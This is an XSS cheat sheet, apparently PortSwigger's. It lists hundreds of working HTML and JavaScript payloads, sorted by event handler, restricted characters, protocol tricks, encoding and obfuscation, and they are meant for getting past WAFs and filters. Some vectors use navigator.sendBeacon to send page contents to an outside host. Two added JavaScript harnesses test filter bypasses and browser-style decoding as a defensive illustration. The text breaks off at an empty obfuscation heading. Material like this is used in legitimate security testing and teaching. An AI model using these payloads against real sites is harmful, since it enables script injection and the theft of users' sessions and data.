Cross-site scripting (XSS) cheat sheet
This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser, and a proof of concept is included for every vector. The cheat sheet is regularly updated (2020). Last updated: Fri, 07 Aug 2020 14:49:08 +0000.
Event handlers
Event handlers that do not require user interaction
onactivate: Fires when the element is activated
<xss id=x tabindex=1 onactivate=alert(1)></xss>
onafterprint: Fires after the page is printed
<body onafterprint=alert(1)>
onafterscriptexecute: Fires after a script is executed
<xss onafterscriptexecute=alert(1)><script>1</script>
onanimationcancel: Fires when a CSS animation is cancelled
<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="alert(1)"></xss>
onanimationend: Fires when a CSS animation ends
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
onanimationiteration: Fires when a CSS animation repeats
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
onanimationstart: Fires when a CSS animation starts
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
onbeforeactivate: Fires before the element is activated
<xss id=x tabindex=1 onbeforeactivate=alert(1)></xss>
onbeforedeactivate: Fires before the element is deactivated
<xss id=x tabindex=1 onbeforedeactivate=alert(1)></xss><input autofocus>
onbeforeprint: Fires before the page is printed
<body onbeforeprint=alert(1)>
onbeforescriptexecute: Fires before a script is executed
<xss onbeforescriptexecute=alert(1)><script>1</script>
onbeforeunload: Fires when the URL is about to change (the page is about to unload)
<body onbeforeunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onbegin: Fires when an SVG animation begins
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
onblur: Fires when an element loses focus
<a onblur=alert(1) tabindex=1 id=x></a><input autofocus>
onbounce: Fires when the marquee bounces
<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>
oncanplay: Fires if the resource can be played
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
oncanplaythrough: Fires when enough data has been loaded to play the resource all the way through
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
oncuechange: Fires when a subtitle cue changes
<video controls><source src="validvideo.mp4" type="video/mp4"><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE

1
00:00:00.000 --> 00:00:05.000
<b>XSS</b>

"></video>
ondeactivate: Fires when the element is deactivated
<xss id=x tabindex=1 ondeactivate=alert(1)></xss><input id=y autofocus>
ondurationchange: Fires when the duration changes
<audio controls ondurationchange=alert(1)><source src="validaudio.mp3" type="audio/mpeg"></audio>
onend: Fires when an SVG animation ends
<svg><animate onend=alert(1) attributeName=x dur=1s>
onended: Fires when the resource has finished playing
<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onerror: Fires when the resource fails to load or causes an error
<audio src/onerror=alert(1)>
onfinish: Fires when the marquee finishes
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
onfocus: Fires when the element has focus
<a id=x tabindex=1 onfocus=alert(1)></a>
onfocusin: Fires when the element has focus
<a id=x tabindex=1 onfocusin=alert(1)></a>
onfocusout: Fires when an element loses focus
<a onfocusout=alert(1) tabindex=1 id=x></a><input autofocus>
onhashchange: Fires if the hash changes
<body onhashchange=alert(1)>
onload: Fires when the element is loaded
<body onload=alert(1)>
onloadeddata: Fires when the first frame is loaded
<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onloadedmetadata: Fires when the metadata is loaded
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
onloadend: Fires when the element finishes loading
<image src="validimage.png" onloadend=alert(1)>
onloadstart: Fires when the element begins to load
<image src="validimage.png" onloadstart=alert(1)>
onmessage: Fires when a message event is received from a postMessage call
<body onmessage=alert(1)>
onpageshow: Fires when the page is shown
<body onpageshow=alert(1)>
onplay: Fires when the resource is played
<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onplaying: Fires when the resource is playing
<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpopstate: Fires when the history changes
<body onpopstate=alert(1)>
onprogress: Fires when the video/audio begins downloading
<audio controls onprogress=alert(1)><source src="validaudio.mp3" type="audio/mpeg"></audio>
onreadystatechange: Fires when the ready state changes
<applet onreadystatechange=alert(1)></applet>
onrepeat: Fires when an SVG animation repeats
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
onresize: Fires when the window is resized
<body onresize=alert(1)>
onscroll: Fires when the page scrolls
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onstart: Fires when the marquee starts
<marquee onstart=alert(1)>XSS</marquee>
ontimeupdate: Fires when the playback position changes
<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
ontoggle: Fires when the details tag is expanded
<details ontoggle=alert(1) open>test</details>
ontransitioncancel: Fires when a CSS transition is cancelled
<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
ontransitionend: Fires when a CSS transition ends
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionend=alert(1)></xss>
ontransitionrun: Fires when a CSS transition begins
<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=alert(1)></xss>
ontransitionstart: Fires when a CSS transition starts
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection: Fires when a promise rejection is not handled
<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload: Fires when the page is unloaded
<body onunload=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onwaiting: Fires while waiting for data
<video autoplay controls onwaiting=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onwebkitanimationend: Fires when a CSS animation ends
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
onwebkitanimationiteration: Fires when a CSS animation repeats
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
onwebkitanimationstart: Fires when a CSS animation starts
<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
onwebkittransitionend: Fires when a CSS transition ends
<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
Event handlers that do require user interaction
onauxclick: Fires when right-clicking or using the middle button of the mouse
<input onauxclick=alert(1)>
onbeforecopy: Requires you to copy a piece of text
<a onbeforecopy="alert(1)" contenteditable>test</a>
onbeforecut: Requires you to cut a piece of text
<a onbeforecut="alert(1)" contenteditable>test</a>
onbeforepaste: Requires you to paste a piece of text
<a onbeforepaste="alert(1)" contenteditable>test</a>
onchange: Requires a change of value
<input onchange=alert(1) value=xss>
onclick: Requires a click on the element
<xss onclick="alert(1)">test</xss>
onclose: Fires when a dialog is closed
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
oncontextmenu: Triggered when right-clicking to show the context menu
<xss oncontextmenu="alert(1)">test</xss>
oncopy: Requires you to copy a piece of text
<xss oncopy=alert(1) value="XSS" autofocus tabindex=1>test
oncut: Requires you to cut a piece of text
<xss oncut=alert(1) value="XSS" autofocus tabindex=1>test
ondblclick: Triggered when double-clicking the element
<xss ondblclick="alert(1)" autofocus tabindex=1>test</xss>
ondrag: Triggered while dragging the element
<xss draggable="true" ondrag="alert(1)">test</xss>
ondragend: Triggered when dragging of the element finishes
<xss draggable="true" ondragend="alert(1)">test</xss>
ondragenter: Requires a mouse drag
<xss draggable="true" ondragenter="alert(1)">test</xss>
ondragleave: Requires a mouse drag
<xss draggable="true" ondragleave="alert(1)">test</xss>
ondragover: Triggered when dragging over an element
<div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
ondragstart: Requires a mouse drag
<xss draggable="true" ondragstart="alert(1)">test</xss>
ondrop: Triggered when dropping a draggable element
<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
onfullscreenchange: Fires when a video changes full-screen status
<video onfullscreenchange=alert(1) src="validvideo.mp4" controls>
oninput: Requires a change of value
<input oninput=alert(1) value=xss>
oninvalid: Requires a form submission with an element that does not satisfy its constraints, such as a required attribute
<form><input oninvalid=alert(1) required><input type=submit>
onkeydown: Triggered when a key is pressed
<xss onkeydown="alert(1)" contenteditable>test</xss>
onkeypress: Triggered when a key is pressed
<xss onkeypress="alert(1)" contenteditable>test</xss>
onkeyup: Triggered when a key is released
<xss onkeyup="alert(1)" contenteditable>test</xss>
onmousedown: Triggered when the mouse button is pressed
<xss onmousedown="alert(1)">test</xss>
onmouseenter: Triggered when the mouse is hovered over the element
<xss onmouseenter="alert(1)">test</xss>
onmouseleave: Triggered when the mouse is moved away from the element
<xss onmouseleave="alert(1)">test</xss>
onmousemove: Requires mouse movement
<xss onmousemove="alert(1)">test</xss>
onmouseout: Triggered when the mouse is moved away from the element
<xss onmouseout="alert(1)">test</xss>
onmouseover: Requires a hover over the element
<xss onmouseover="alert(1)">test</xss>
onmouseup: Triggered when the mouse button is released
<xss onmouseup="alert(1)">test</xss>
onmousewheel: Fires when the mouse wheel scrolls
<xss onmousewheel=alert(1)>requires scrolling
onmozfullscreenchange: Fires when a video changes full-screen status (Firefox)
<video onmozfullscreenchange=alert(1) src="validvideo.mp4" controls>
onpagehide: Fires when the page is hidden (navigated away from)
<body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste: Requires you to paste a piece of text
<a onpaste="alert(1)" contenteditable>test</a>
onpause: Requires clicking the element to pause
<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpointerdown: Fires on pointer down
<xss onpointerdown=alert(1)>XSS</xss>
onpointerenter: Fires when the pointer enters the element
<xss onpointerenter=alert(1)>XSS</xss>
onpointerleave: Fires when the pointer leaves the element
<xss onpointerleave=alert(1)>XSS</xss>
onpointermove: Fires when the pointer moves
<xss onpointermove=alert(1)>XSS</xss>
onpointerout: Fires when the pointer moves out of the element
<xss onpointerout=alert(1)>XSS</xss>
onpointerover: Fires when the pointer moves over the element
<xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate: Fires when the pointer changes
<xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup: Fires on pointer up
<xss onpointerup=alert(1)>XSS</xss>
onreset: Requires a click
<form onreset=alert(1)><input type=reset>
onsearch: Fires when a form is submitted and the input has a type attribute of search
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked: Requires clicking the element's timeline
<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking: Requires clicking the element's timeline
<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onselect: Requires you to select text
<input onselect=alert(1) value="XSS" autofocus>
onselectionchange: Fires when the text selection is changed on the page
<body onselectionchange=alert(1)>select some text
onselectstart: Fires when beginning a text selection
<body onselectstart=alert(1)>select some text
onshow: Fires when the context menu is shown
<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit: Requires a form submission
<form onsubmit=alert(1)><input type=submit>
ontouchend: Fires when a touch ends (touch-screen devices only)
<body ontouchend=alert(1)>
ontouchmove: Fires when a touch moves (touch-screen devices only)
<body ontouchmove=alert(1)>
ontouchstart: Fires when a touch starts (touch-screen devices only)
<body ontouchstart=alert(1)>
onvolumechange: Requires a volume adjustment
<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onwheel: Fires when you use the mouse wheel
<body onwheel=alert(1)>
Restricted characters
No parentheses, using exception handling:
<script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons:
<script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions:
<script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval:
<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval, on Firefox:
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval:
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval, without the dot:
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using a location redirect:
<script>location='javascript:alert\x281\x29'</script>
No parentheses, using a location redirect, no strings:
<script>location=name</script>
No parentheses, using template strings:
<script>alert`1`</script>
No parentheses, using template strings and location.hash:
<script>new Function`X${document.location.hash.substr`1`}```</script>
No parentheses or spaces, using template strings and location.hash:
<script>Function`X${document.location.hash.substr`1`}```</script>
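The table above is a list of one-liners; the practical point is that a filter which only rejects `(` and `)` does not stop a function call. The harness below is an added example and is not part of the PortSwigger cheat sheet: it runs each vector with `alert` replaced by a recording `sink`, first past a hypothetical no-parentheses filter and then through `runAsScript`, which emulates (an assumption, not browser code) the Chrome behaviour of handing an uncaught exception to `window.onerror` as the message "Uncaught <value>". Everything else is plain ECMAScript and runs under Node.

```javascript
'use strict';

// Records every call that reaches the "alert" stand-in. Defined on globalThis
// because the vectors run in global scope, as an inline <script> would.
const calls = [];
globalThis.sink = (...args) => { calls.push(String(args[0])); return 'sink-called'; };

// Hypothetical "no parentheses" filter of the kind these vectors defeat:
// returns null when it would block the payload, the payload otherwise.
function noParensFilter(src) {
  return /[()]/.test(src) ? null : src;
}

// Evaluate in global scope (indirect eval, non-strict) and route an uncaught
// exception to a global onerror handler the way a browser script element would.
function runAsScript(src) {
  try {
    (0, eval)(src);
  } catch (e) {
    if (typeof globalThis.onerror === 'function') {
      globalThis.onerror('Uncaught ' + e); // Chrome-style message text (assumption)
    }
  }
}

// The page's vectors with alert replaced by sink. \x28 and \x29 are "(" and ")"
// inside a string literal, which the filter never sees as parentheses.
const vectors = {
  exceptionHandler:     'onerror=sink;throw 1',
  exceptionNoSemicolon: '{onerror=sink}throw 2',
  exceptionExpression:  'throw onerror=sink,3',
  exceptionEval:        "throw onerror=eval,'=sink\\x284\\x29'",
  hasInstance:          "'sink\\x285\\x29'instanceof{[Symbol.hasInstance]:eval}",
  hasInstanceNoDot:     "'sink\\x286\\x29'instanceof{[Symbol['hasInstance']]:eval}",
  templateString:       'sink`7`',
  functionTemplate:     'Function`X${"sink\\x288\\x29"}```',
};

// Run every vector the filter lets through; return the names of those that
// reached the sink anyway.
function bypasses() {
  const reached = [];
  for (const [name, src] of Object.entries(vectors)) {
    if (noParensFilter(src) === null) continue; // the filter would have blocked it
    calls.length = 0;
    delete globalThis.onerror;   // reset state left by the previous vector
    delete globalThis.Uncaught;  // created by the eval-as-onerror vector
    runAsScript(src);
    if (calls.length > 0) reached.push(name);
  }
  return reached;
}

// Which vectors got past the filter and still called the sink?
console.log(bypasses());
```

The `exceptionEval` case is worth tracing: the thrown string becomes the message `Uncaught =sink(4)`, which `eval` then executes as an assignment to a global named `Uncaught`, so the "message" itself is what carries the call. Filtering on parentheses, or on `alert`, therefore says nothing about whether a script can call a function; the only robust control is not letting attacker text reach a JavaScript execution context at all.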
Frameworks
Bootstrap onanimationstart event:
<xss class="progress-bar-animated" onanimationstart="alert(1)">
Bootstrap ontransitionend event:
<xss class="carousel slide" data-ride="carousel" data-interval=100 ontransitionend="alert(1)"><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>
Protocols
Iframe src attribute with the JavaScript protocol:
<iframe src="javascript:alert(1)">
Object data attribute with the JavaScript protocol:
<object data="javascript:alert(1)">
Embed src attribute with the JavaScript protocol:
<embed src="javascript:alert(1)">
A standard JavaScript protocol link:
<a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive:
<a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol:
<a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a and \x0d are allowed inside the protocol (a tab here):
<a href="javas	cript:alert(1)">XSS</a>
Characters \x09, \x0a and \x0d are allowed after the protocol name, before the colon (a tab here):
<a href="javascript	:alert(1)">XSS</a>
Xlink namespace inside SVG with the JavaScript protocol:
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
SVG animate tag using values:
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using from and to:
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag:
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src:
<script src="data:text/javascript,alert(1)"></script>
SVG script href attribute without a closing script tag:
<svg><script href="data:text/javascript,alert(1)" />
SVG use element (Chrome/Firefox):
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with a data URL:
<script>import('data:text/javascript,alert(1)')</script>
Base tag with the JavaScript protocol, rewriting relative URLs:
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable:
<math><x href="javascript:alert(1)">blah
Button and formaction:
<form><button formaction=javascript:alert(1)>XSS
Input and formaction:
<form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action:
<form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL:
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values:
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using the srcdoc attribute:
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities:
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form:
<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X):
<input type="hidden" accesskey="X" onclick="alert(1)">
Link elements: access key attributes can enable XSS on normally unexploitable elements (press ALT+SHIFT+X on Windows, CTRL+ALT+X on OS X):
<link rel="canonical" accesskey="X" onclick="alert(1)" />
The download attribute can save a copy of the current web page:
<a href=# download="filename.html">Test</a>
Disable the referrer using referrerpolicy:
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Set window.name via a parameter of the window.open function:
<a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via the name attribute of an <iframe> tag:
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via the target attribute of a <base> tag:
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via the target attribute of an <a> tag:
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via the usemap attribute of an <img> tag:
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via the target attribute of a <form> tag:
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via the formtarget attribute of an <input> tag of type submit:
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via the formtarget attribute of an <input> tag of type image:
<form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain:
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Meta charset attribute, UTF-7:
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta Content-Type header, UTF-7:
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document), variant 1:
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document), variant 2:
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document), variant 3:
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document), variant 4:
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests:
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via an iframe sandbox:
<iframe sandbox src="//portswigger-labs.net"></iframe>
Disable the referrer:
<meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8:
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
Unicode escapes:
<script>\u0061lert(1)</script>
Unicode escapes, ES6 style:
<script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded:
<script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes:
<script>eval('\x61lert(1)')</script>
Octal encoding:
<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with an optional semicolon:
<a href="&#106;avascript:alert(1)">XSS</a> <a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding:
<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros:
<a href="&#0000106;avascript:alert(1)">XSS</a>
Hex encoding entities:
<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without a semicolon, provided the next character is not a-f0-9 (the second example separates the reference with a tab, which is allowed inside the protocol):
<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a	avascript:alert(1)">XSS</a>
Hex encoding with padded zeros:
<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive:
<a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities:
<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding:
<a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding:
<a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
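The Protocols and Encoding tables above show what the browser tolerates in a URL attribute; a server-side filter that compares the raw attribute text against "javascript:" misses every one of those rows. The checker below is an added example, not code from the PortSwigger cheat sheet: it applies the same decoding steps the browser does (character references, leading \x01-\x20, embedded \t \n \r, case folding) before looking at the scheme, and separately contrasts strict UTF-8 decoding with a deliberately lenient decoder to show why the overlong-UTF-8 row only works against a parser that skips the minimum-length check. Assumptions: the named-entity table is cut down to the entities the page uses, `lenientUtf8` models a hypothetical non-conforming parser, and the sample URLs are transcribed from the tables above.

```javascript
'use strict';

// Named references the page's vectors use; a full table would cover all of HTML's.
const NAMED_ENTITIES = {
  colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')',
  sol: '/', quot: '"', lt: '<', gt: '>', amp: '&', percnt: '%',
};

// Decode character references the way an HTML attribute value is decoded:
// decimal (&#106; &#0000106;), hex in either case (&#x6a; &#X6A;), and a
// semicolon that is optional when the following character cannot extend the number.
function decodeEntities(s) {
  return s.replace(/&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?|&([A-Za-z]+);/g, (m, hex, dec, name) => {
    let cp;
    if (hex !== undefined) cp = parseInt(hex, 16);
    else if (dec !== undefined) cp = parseInt(dec, 10);
    else return name in NAMED_ENTITIES ? NAMED_ENTITIES[name] : m;
    return cp > 0x10FFFF ? '\uFFFD' : String.fromCodePoint(cp);
  });
}

// Apply the URL-scheme tolerances the Protocols table relies on: \x01-\x20 are
// ignored before the scheme, \t \n \r are ignored anywhere in it, case is folded.
function schemeOf(url) {
  const cleaned = url.replace(/^[\x01-\x20]+/, '').replace(/[\t\n\r]/g, '');
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// True when the attribute value would run script once the browser has decoded it.
function isScriptUrl(attrValue) {
  return schemeOf(decodeEntities(attrValue)) === 'javascript';
}

// Strict UTF-8 (what a browser does): overlong sequences become U+FFFD.
function strictUtf8(bytes) {
  return new TextDecoder('utf-8').decode(Uint8Array.from(bytes));
}

// Lenient UTF-8 (assumption: a hypothetical permissive parser): accepts overlong
// 2-6 byte forms without a minimum-length check, so C0 BC decodes to "<".
function lenientUtf8(bytes) {
  let out = '';
  for (let i = 0; i < bytes.length; ) {
    const b = bytes[i];
    let len = 1, cp = b;
    if (b >= 0xC0 && b < 0xE0)      { len = 2; cp = b & 0x1F; }
    else if (b >= 0xE0 && b < 0xF0) { len = 3; cp = b & 0x0F; }
    else if (b >= 0xF0 && b < 0xF8) { len = 4; cp = b & 0x07; }
    else if (b >= 0xF8 && b < 0xFC) { len = 5; cp = b & 0x03; }
    else if (b >= 0xFC && b < 0xFE) { len = 6; cp = b & 0x01; }
    for (let k = 1; k < len; k++) cp = (cp << 6) | (bytes[i + k] & 0x3F);
    out += cp > 0x10FFFF ? '\uFFFD' : String.fromCodePoint(cp);
    i += len;
  }
  return out;
}

// Constructed samples, transcribed from the Protocols and Encoding tables.
const SAMPLES = [
  'javascript:alert(1)',
  'JaVaScript:alert(1)',
  ' javascript:alert(1)',            // \x01-\x20 before the protocol
  'javas\tcript:alert(1)',           // tab inside the protocol
  'javascript\n:alert(1)',           // newline before the colon
  '&#106;avascript:alert(1)',
  '&#0000106;avascript:alert(1)',
  '&#x6a;avascript:alert(1)',
  'j&#x61vascript:alert(1)',         // no semicolon, next char is not hex
  '&#X6A;avascript:alert(1)',
  'javascript&colon;alert(1)',
  'java&Tab;script:alert(1)',
  'java&NewLine;script:alert(1)',
  'https://example.invalid/?q=javascript:alert(1)', // not a script URL
];

// The samples a server-side filter would have to flag (all but the last).
function flaggedSamples() {
  return SAMPLES.filter(isScriptUrl);
}

// The five overlong encodings of "<" from the Encoding table, as bytes.
const OVERLONG_LT = [
  [0xC0, 0xBC],
  [0xE0, 0x80, 0xBC],
  [0xF0, 0x80, 0x80, 0xBC],
  [0xF8, 0x80, 0x80, 0x80, 0xBC],
  [0xFC, 0x80, 0x80, 0x80, 0x80, 0xBC],
];

// How many of the overlong forms each decoder turns into "<".
function overlongComparison() {
  return {
    strict: OVERLONG_LT.filter(b => strictUtf8(b).includes('<')).length,
    lenient: OVERLONG_LT.filter(b => lenientUtf8(b) === '<').length,
  };
}

console.log(flaggedSamples().length, 'of', SAMPLES.length, 'samples are script URLs');
console.log(overlongComparison());
```

Two design points carry over to real filters. First, decode before you compare: the order here (entity decoding, then whitespace stripping, then case folding) mirrors the browser, so `java&Tab;script:` and `&#x6a;avascript:` end up as the same scheme. Second, the overlong comparison shows where the risk actually sits: the strict decoder never yields `<`, so the row is a finding against a back-end or intermediate parser that decodes leniently, not against a current browser.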
Obfuscation
Data protocol inside script src with base64:
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Data protocol inside script src with base64 and HTML entities:
<script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding:
<script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc, HTML encoded:
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding:
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding:
